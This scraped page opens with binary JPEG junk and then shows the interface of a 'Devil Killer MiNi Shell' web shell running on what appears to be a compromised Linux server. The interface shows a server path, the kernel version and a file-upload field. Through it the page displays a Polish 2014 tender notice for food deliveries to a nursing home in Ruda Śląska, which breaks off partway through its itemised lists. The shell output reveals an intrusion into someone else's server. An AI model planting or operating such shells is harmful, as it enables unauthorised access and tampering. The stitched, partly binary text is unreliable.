JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141127/246563-N-2014.html

<p class="kh_header"><b>Ruda Śląska: Dostawa artykułów żywnościowych dla Domu Pomocy Społecznej Senior w Rudzie Śląskiej</b><br>
<b>Numer ogłoszenia: 246563 - 2014; data zamieszczenia: 27.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej "Senior" w Rudzie Śląskiej , ul. Puszkina 7, 41-704 Ruda Śląska, woj. śląskie, tel. 032 2481774, faks 032 2481774 w. 33.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych dla Domu Pomocy Społecznej Senior w Rudzie Śląskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów żywnościowych z podziałem na wyszczególnione poniżej pakiety:
Pakiet nr 1	Dostawa przetworów spożywczych
Pakiet nr 2	Dostawa artykułów sypkich 
Pakiet nr 3	Dostawa artykułów nabiałowych 
Pakiet nr 4	Dostawa pieczywa 
Pakiet nr 5	Dostawa wypieków cukierniczych 
Pakiet nr 6	Dostawa warzyw świeżych i suszonych 
Pakiet nr 7	Dostawa owoców świeżych 
Pakiet nr 8	Dostawa warzyw i owoców mrożonych 
Pakiet nr 9	Dostawa ryb mrożonych, wędzonych i przetworów rybnych 
Pakiet nr 10 Dostawa mięsa wieprzowego i wołowego oraz podrobów 
Pakiet nr 11 Dostawa mięsa i podrobów drobiowych 
Pakiet nr 12 Dostawa wędlin 
Pakiet nr 13 Dostawa jaj kurzych 
Pakiet nr 14	 Dostawa czekolad i wyrobów cukierniczych 
Pakiet nr 15 Dostawa napojów bezalkoholowych 
Szczegółowy opis przedmiotu zamówienia zawiera Specyfikacja Istotnych Warunków Zamówienia (SIWZ)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5, 15.41.00.00-5, 15.61.00.00-7, 15.82.11.50-5, 15.83.00.00-5, 15.84.10.00-5, 15.85.10.00-8, 15.86.00.00-4, 15.87.00.00-7, 15.50.00.00-3, 15.43.00.00-1, 15.89.80.00-9, 15.81.00.00-9, 03.22.00.00-9, 03.21.00.00-6, 15.33.11.70-9, 15.31.11.00-2, 15.20.00.00-0, 15.22.00.00-6, 15.23.40.00-7, 15.11.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.dps-senior.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej SENIOR w Rudzie Śląskiej
ul. Puszkina 7 
Ruda Śląska 41-704
Dział Techniczno - Zaopatrzeniowy pok. nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2014 godzina 11:30, miejsce: Dom Pomocy Społecznej SENIOR w Rudzie Śląskiej
ul. Puszkina 7 
Ruda Śląska 41-704
pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> DOSTAWA PRZETWORÓW SPOŻYWCZYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp	Nazwa artykułu	Sugerowana wielkość
opakowania	Jm	Orientacyjna ilość
zamówienia*	Cena jedn. netto	
Wartość netto	
Stawka 
Vat	
Wartość brutto **
a	B	c	d	e	f	g	h	i
I	Przetwory, tłuszcze roślinne





1	Ananas kons. plastry-(masa netto bez zalewy)	300-1000g	kg	9
				
2	Brzoskwinie kons.-(masa netto bez zalewy) 	300-1000g 	kg	7
				
3	Chrzan tarty na kwasku cytrynowym	170-300g	kg	20
				
4	Ćwikła z chrzanem	250-500g	kg	6
				
5	Dżemy owocowe niskosłodzone z kawałkami owoców (różne smaki) 	250-350g	kg	48
				
6	Fasola czerwona, biała konserwowa-(masa netto bez zalewy)	200-500g	kg	8
				
7	Fasola szparagowa konserwowa-(masa netto bez zalewy)	200-1000g	kg	50				
8	Groszek konserwowy- (masa netto bez zalewy)	200-500g	kg	55
				
9	Krem chrzanowy	170-300g	kg	3
				
10	Ketchup łagodny(minimum 55% przecieru pomidorowego	250-1000g	kg	100
				
11	Koncentrat pomidorowy30%	800-1000g	kg	55
				
12	Koncentrat pomidorowy30%	180-250g	kg	25
				
13	Koncentrat buraczany płynny min.12% soku 
z buraków	180-500g	kg	7
				
14	Krem czekoladowy 
do smarowania z dodatkiem orzechów	180-400g	kg	12
				
15	Kukurydza konserwowa- (masa netto bez zalewy)	200-500g	kg	9
				
16	Miód naturalny	200-500g	kg	10
				
17	Musztarda delikatesowa	800-1000g	kg	60
				
18	Musztarda delikatesowa	150-250g	kg	35
				
19	Ocet 10%	0,5l	l	45
				
20	Ogórki konserwowe całe -(masa netto bez zalewy)	900-1000g	kg	95
				
21	Olej uniwersalny rzepakowy	0,90-1,0 l	l	290
				
22	Olej słonecznikowy	0,5-1,0l	l	10				
23	Papryka konserwowa słodka płaty -(masa netto bez zalewy)	500-1000g	kg	5
				
24	Powidła śliwkowe	280-500g	kg	30
				
25	Przyprawa do zup w płynie	900-1000g	l	195
				
26	Seler konserwowy (nitki)-(masa netto bez zalewy)	280-500g	kg	7
				
27	Sos słodko kwaśny, chiński, meksykański, itp..	300-600g	kg	12
				
28	Zaprawa cytrynowa min.40%soku z cytryny	0,5-1l	l	
200
				
29	Majonez dekoracyjny sałatkowy	180-300g	kg	35				
30	Majonez dekoracyjny sałatkowy	500-1000g	kg	60
				
II	Konserwy mięsne



1	Mielonka konserwowa - turystyczna, tyrolska, itp.	100-300g	kg	35
				
2	Szynka konserwowa wieprzowa 	100-300g	kg	8				
3	Szynka konserwowa drobiowa 	100-300g	kg	16
				
4	Pasztet drobiowy smakowy	100-200g	kg	9				
5	Pasztet drobiowy 	160g	kg	35				
6	Pasztet wieprzowy	100-300g	kg	65.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5, 15.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> DOSTAWA ARTYKUŁÓW SYPKICH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp	Nazwa artykułu	Sugerowana wielkość
opakowania	Jm	Orientacyjna ilość
zamówienia	Cena jedn. netto	
Wartość netto	
Stawka 
Vat	
Wartość brutto 
a	B	c	d	e	f	g	h	i
1	Budyń - różne smaki (bez dodatku cukru)	1000g	kg	30
				
2	Budyń - różne smaki (bez dodatku cukru)	35-60g	kg	10
				
3	Bulion grzybowy, sypki	500-1000g	kg	2
				
4	Cukier kryształ	1000g	kg	1400
				
5	Cukier wanilinowy	10-50g	kg	0,7
				
6	Cynamon mielony	10-20g	kg	0,3
				
7	Czosnek granulowany, polski	10-20g	kg	8
				
8	Galaretka owocowa, różne smaki	75-100g	kg	20
				
9	Gałka muszkatołowa, mielona	10-20g	kg	0,1
				
10	Herbata expresowa owocowa, różne smaki, a 20 szt	30-40g	kg	1,5
				
11	Herbata expresowa czarna a 100 szt.	100-150g	kg	62
				
12	Herbata expresowa ziołowa  a 20 szt (mięta, melisa, rumianek)	30-40g	kg	0,5
				
13	Kakao extra, ciemne	100-200g	kg	3
				
14	Kasza gryczana, cała	500-1000g	kg	25
				
15	Kasza jęczmienna , średnia	500-1000g	kg	60
				
16	Kasza manna	500-1000g	kg	50
				
17	Kaszka mleczno - ryżowa (smakowa)	230g	kg	12
				
18	Kawa naturalna mielona 100%	250-500g	kg	35
				
19	Kawa zbożowa	200-500g	kg	18
				
20	Kleik ryżowy	160-200g	kg	5
				
21	Kminek	10-20g	kg	0,3
				
22	Kwasek cytrynowy	10-20g	kg	1
				
23	Liść laurowy	5-20g	kg	0,3
				
24	Majeranek	5-20g	kg	1
				
25	Makaron 4 jajeczny -          łazanki 250-1000g	kg	30
				
26	Makaron 4 jajeczny - nitki  	250-1000g	kg	65
				
27	Makaron 4-jajeczny - (kolanka, rurki, muszelki, świderki) 	250-1000g	kg	120
				
28	Mąka pszenna poznańska	1000g	kg	400
				
29	Mąka ziemniaczana	1000g	kg	220
				
30	Mąka żytnia żurek	1000g	kg	20				
31	Papryka słodka mielona	10-20g	kg	2,5
				
32	Pieprz czarny mielony	10-20g	kg	3				
33	Płatki kukurydziane smakowe	500-1000g	kg	10
				
34	Płatki owsiane	500g	kg	25
				
35	Płatki ryżowe	200-500g	kg	18
				
36	Przyprawa warzywna 
do potraw	75-200g	kg	14
				
37	Rosół drobiowy,  sypki	500-3000g	kg	28
				
38	Ryż biały	1000g	kg	130
				
39	Sos pieczeniowy jasny	25-50g	kg	2				
40	Sos pieczeniowy ciemny	25-50g	kg	4
				
41	Sos sałatkowy, różne smaki	8-20g	kg	0,5
				
42	Sól spożywcza jodowana	1000g	kg	190
				
43	Sucharki	280-300g	kg	5
				
44	Ziele angielskie	10-20g	kg	0,4
				
45	Żelatyna spożywcza wieprzowa	50g	kg	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.00.00-7, 15.82.11.50-5, 15.83.00.00-5, 15.84.10.00-5, 15.85.10.00-8, 15.86.00.00-4, 15.87.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> DOSTAWA ARTYKUŁÓW NABIAŁOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp	Nazwa artykułu	Sugerowana wielkość
opakowania	Jm	Orientacyjna ilość
zamówienia*	Cena jedn. netto	
Wartość netto	
Stawka 
Vat	
Wartość brutto **
a	B	c	d	e	f	g	h	i
1	Deser wielosmakowy: ryżowy, z kaszą manną 	120-200g	kg	50				
2	Deser wielosmakowy z bitą śmietaną na bazie budyniu,  twarożku 	120-200g	kg	90				
3	 Jogurt owocowy 	125-200g	kg	285				
4	Jogurt naturalny 	150-200g	kg	150				
5	Maślanka naturalna karton	1L	l	300				
6	Maślanka owocowa	250-500g	kg	75				
7	Kefir naturalny	150-250g	kg	40				
8	Margaryna do smarowania pieczywa z dodatkiem masła	500g	kg	8				
9	Margaryna mleczna zwykła 	250g	kg	130				
10	Masło extra 82% 	200g	kg	750				
11	Mix tłuszczowy do smarowania min. 75 % tłuszczu (zawartość  tłuszczu mlecznego min. 12%)	200-250g	kg	100				
12	Mleko 2%  	5-20l 	l	5400				
13	Mleko 2% w folii	1l	l	270				
14	Ser biały półtłusty - krajanka	kg	kg	300				
15	Ser podpuszczkowy pleśniowy 	100-200g	kg	6				
16	Ser domowy z kminkiem	150-200g	kg	70				
17	Ser wielosmakowy fromage	75-100g	kg	60				
18	Ser żółty łagodny 45% tłuszczu	1000-3000g	kg	75				
19	Ser żółty wędzony	1000-2000g	kg	10				
20	Serek topiony kremowy -27% tł.(pochodzenia zwierzęcego)-różne smaki	100g	kg	85				
21	Serek topiony kremowy wędzony 	1000-2000g	kg	60				
22	Serek homogenizowany różne smaki	100-200g	kg	235				
23	Serek naturalny homogenizowany	100-200g	kg	60				
24	Serek kanapkowy twarożkowy, kremowy - różne smaki	100-150g	kg	85				
25	Serek twarożkowy wiejski ziarnisty	200g	kg	170				
26	Śmietanka do kawy 10% tłuszczu	10 g	szt.	1200				
27	Śmietana spożywcza słodka 18% tłuszczu 	250-500ml	l	175				
28	Śmietana 12% tłuszczu homogenizowana 	180g-400g	kg	5				
29	Śmietana 30%tłuszczu- kremówka	200-500g	kg	15				
30	Smalec wieprzowy kostka	200-250g	kg	20				
31	Napój probiotyczny 	100g	kg	2				
32	Drożdże piekarnicze świeże	42-100g	kg	2,5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.43.00.00-1, 15.89.80.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> DOSTAWA PIECZYWA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

L.p	Nazwa artykułu	Sugerowana waga jednostkowa	Jm	Orientacyjna
ilość zamówienia*	Cena jedn. netto	

Wartość netto	

Stawka Vat	Wartość brutto **
a	B	c	d	e	f	g	h	i
1
	Chleb  pszenno- żytni krojony	900-1000g	kg	6000				
2
	Chleb wielosmakowy - krojony (słonecznikowy, sojowy, graham, karmelowy, cebulowy, razowy itd.)	400-500g	kg	670				
3	Wek krojony	300g-500g	kg	90				
4	Bułka kajzerka	50g	kg	700				
5	Pieczywo mleczne (rogal, chałka)	50g-100g	kg	40				
6	Bułka mleczna	50g-80g	kg	90				
7	Bułka tarta	400-500g	kg	110.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> DOSTAWA WYPIEKÓW CUKIERNICZYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA


Lp.	Nazwa artykułu	Sugerowana waga jednostkowa	Jm	Orientacyjna ilość zamówienia*	Cena jedn. netto	Wartość netto	Stawka VAT	Wartość brutto**
a	B	c	d	e	f	g	h	i
1	Rogalik z różnymi nadzieniami(budyń, śmietana, czekolada itp.)	70-100g	kg	70				
2	Rogalik z różnymi nadzieniami z ograniczoną ilością cukru	70-100g	kg	20				
3	Drożdżówka wielosmakowa (ser-mak, ser-marmolada )	80-120g	kg	70				
4	Drożdżówka z ograniczoną ilością cukru	80-120g	kg	20				
5	Jagodzianka	70-100g	kg	35				
6	Jagodzianka z ograniczoną ilością cukru	70-100g	kg	12				
7	Pączek z różnym nadzieniem (śmietana, marmolada, budyń, adwokat itd..)	80-100g	kg	110				
8	Pączek z ograniczoną ilością cukru, bez polewy	80-100g	kg	30				
9	Ciastko W-Z	80-100g	kg	15				
10	Sernik 
na drożdżowym spodzie	 	kg	70				
11	Ciasto drożdżowe z posypką	 	kg	20				
12	Ciasto z owocami 
na drożdżowym spodzie 	 	kg	70				
13	Ciasto z owocami 
na piaskowym spodzie	 	kg	90				
14	Szarlotka	 	kg	70				
15	Sernik na cieście ucieranym	 	kg	60				
16	Rolada z bitą śmietaną	 	kg	35				
17	Ptysie miniaturki ze śmietaną, budyniem, itp. 	 	kg	12				
18	Ciasteczka kokosanki	 	kg	35				
19	Piernik z bakaliami w czekoladzie	 	kg	15				
20	Faworki		kg	5				
21	Pączki mini		kg	5				
22	Babeczki piaskowe	50-100g	kg	90.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> DOSTAWA WARZYW ŚWIEŻYCH I SUSZONYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp.	Nazwa artykułu	Sugerowana waga jednostkowa	Jm	Orientacyjna ilość zamówienia*	Cena jedn. netto	Wartość netto	Stawka Vat	Wartość brutto **
a	B	c	d	e	f	g	h	i
1	Buraki 	 	kg	320				
2	Botwinka 	 	kg	20				
3	Brokuły różyczka 	 	kg	5				
4	Cebula	 	kg	220				
5	Cebulka zielona, szczypiorek (m-c I-IV) 	 	kg	25				
6	Cebulka zielona, szczypiorek- (m-c V-VI)	 	kg	20				
7	Czosnek polski	 	kg	15				
8	Kalafior różyczka 	 	kg	5				
9	Kalarepa	 	kg	35				
10	Kapusta biała	 	kg	380				
11	Kapusta biała młoda 	 	kg	85				
12	Kapusta czerwona	 	kg	320				
13	Kapusta czerwona młoda 	 	kg	30				
14	Kapusta kiszona 	 	kg	350				
15	Kapusta pekińska	 	kg	70				
16	Kapusta włoska	 	kg	80				
17	Kapusta włoska młoda	 	kg	5				
18	Koperek zielony (I-IV m-c)	 	kg	25				
19	Koperek zielony (V-VI m-c)	 	kg	20				
20	Ogórki kiszone	 	kg	85				
21	Ogórki małosolne	 	kg	20				
22	Ogórki zielone           (I-V   m-c)	 	kg	40				
23	Ogórki zielone         (VI m-c)	 	kg	25				
24	Papryka czerwona 	 	kg	15				
25	Pieczarki	 	kg	140				
26	Pietruszka korzeń	 	kg	350				
27	Pietruszka zielona     (I-IV m-c)	 	kg	50				
28	Pietruszka zielona   (V-VI m-c)	 	kg	30				
29	Pomidory (I-V m-c)	 	kg	180				
30	Pomidory (VI m-c)	 	kg	70				
31	Por	 	kg	75				
32	Rzodkiewka              (I-IV   m-c)	100g	pęczek	30				
33	Rzodkiewka (V-VI m-c)	100g	pęczek	45				
34	Sałata zielona           (I-IV   m-c)	200g	szt	10				
35	Sałata zielona           (V-VI m-c)	300g	szt	70				
36	Seler korzeń	 	kg	400				
37	Marchew	 	kg	1070				
38	Ziemniaki 	 	kg	8300				
39	Ziemniaki młode       (VI m-c)	 	kg	900				
40	Fasola kolorowa	 	kg	10				
41	Fasola Jaś	 	kg	30				
42	Groch łuszczony	 	kg	25				
43	Grzyby suszone	 	kg	0,5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 03.21.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> DOSTAWA OWOCÓW ŚWIEŻYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA
 
Lp.	Nazwa artykułu	Sugerowana waga jednostkowa	Jm	Orientacyjna ilość zamówienia*	Cena jedn. netto	Wartość netto	Stawka Vat	Wartość brutto**
a	B	c	d	e	f	g	h	i
1	Arbuz		kg	60				
2	Banany	200g/szt	kg	950				
3	Brzoskwinia 	150g/szt	kg	15				
4	Czereśnie		kg	50				
5	Grapefruit	300-400g/szt	kg	90				
6	Jabłka		kg	750				
7	Jabłka deserowe 	200g/szt	kg	470				
8	Jagody		kg	3				
9	Mandarynki	80-100g/szt	kg	420				
10	Nektaryny		kg	15				
11	Owoce kiwi	100-120g/szt	kg	75				
12	Pomarańcze	200g/szt	kg	650				
13	Truskawki świeże		kg	230				
14	Winogrona deserowe 		kg	25				
15	Rabarbar		kg	250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> DOSTAWA WARZYW I OWOCÓW MROŻONYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp.	Nazwa artykułu	Sugerowana wielkość opakowania	Jm	Orientacyjna ilość zamówienia*	Jedn. cena netto	Wartość netto	Stawka Vat	Wartość brutto**
a	B	c	d	e	f	g	h	i
1	Brokuły 	450g	kg	5				
2	Brokuły 	2000-2500g	kg	55				
3	Brukselka	450g	kg	3				
4	Brukselka	2000-2500g	kg	20				
5	Kalafior	450g	kg	5				
